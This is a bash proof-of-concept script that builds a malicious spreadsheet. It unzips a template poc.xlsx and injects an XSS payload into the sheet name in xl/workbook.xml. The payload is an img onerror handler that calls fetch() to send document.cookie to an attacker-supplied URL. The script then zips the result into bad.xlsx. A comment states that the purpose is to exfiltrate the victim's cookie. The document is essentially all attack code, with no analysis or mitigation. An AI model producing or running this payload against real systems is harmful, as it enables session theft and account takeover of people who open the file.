#!/bin/bash

if [ -z "$1" ]; then
   # URL to exfiltrate the victim's cookie
    echo "[*] Usage: $0 http://ip:port"
    exit 1
fi

url=$1
file="poc.xlsx"
bad="bad.xlsx"

safe_url=$(printf '%s\n' "$url" | sed 's/[&/\]/\\&/g')

echo "[*] unzipping poc file"
unzip poc.xlsx xl/workbook.xml

echo "[*] updating sheet name"
sed -i "s|img src=x|img src=x onerror=fetch('${safe_url}?'+document.cookie)|" xl/workbook.xml

cp $file $bad
zip -r $bad xl/workbook.xml
echo "[+] created $bad"

# update the xl/workbook.xml file with another payload if required
# rm -rf xl